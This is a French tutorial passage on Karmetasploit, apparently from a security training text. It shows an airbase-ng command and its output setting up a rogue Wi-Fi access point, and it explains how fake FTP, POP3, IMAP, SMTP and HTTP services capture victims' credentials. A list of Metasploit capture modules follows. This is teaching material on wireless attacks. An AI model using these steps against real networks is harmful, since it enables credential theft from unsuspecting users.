Sommaire

Karmetasploit

Le nombre vertigineux de réseaux Wi-Fi en fait une place de choix pour les attaquants. En effet, grâce à des outils faisant partie de la suite Aircrack-ng, il est devenu relativement simple de mettre en place un faux réseau Wi-Fi :

root@kali:~# airbase-ng -c 5 -e ENI wlan0mon  
15:55:00  Created tap interface at0  
15:55:00  Trying to set MTU on at0 to 1500  
15:55:00  Trying to set MTU on wlan0mon to 1800  
15:55:00  Access Point with BSSID 4E:EF:AA:3C:46:D8 started.

Dès lors et grâce à l’utilisation de techniques de social engineering, il est possible qu’un utilisateur se connecte sur ce point d’accès malveillant. Suite à la connexion de l’utilisateur sur le réseau Wi-Fi malveillant, Karmetasploit effectue deux actions distinctes :

  • Lancement de faux services non sécurisés (FTP, POP3, IMAP, SMTP ou encore HTTP) dans le but d’obtenir les identifiants des victimes grâce aux modules de type auxiliary/server/capture*

msf5 > search auxiliary/server/capture  
 
Matching Modules  
================  
  #   Name  
  -   ----  
  1   auxiliary/docx/word_unc_injector  
  2   auxiliary/fileformat/odt_badodt  
  3   auxiliary/scanner/sap/sap_smb_relay  
  4   auxiliary/server/capture/drda  
  5   auxiliary/server/capture/ftp  
  6   auxiliary/server/capture/http ...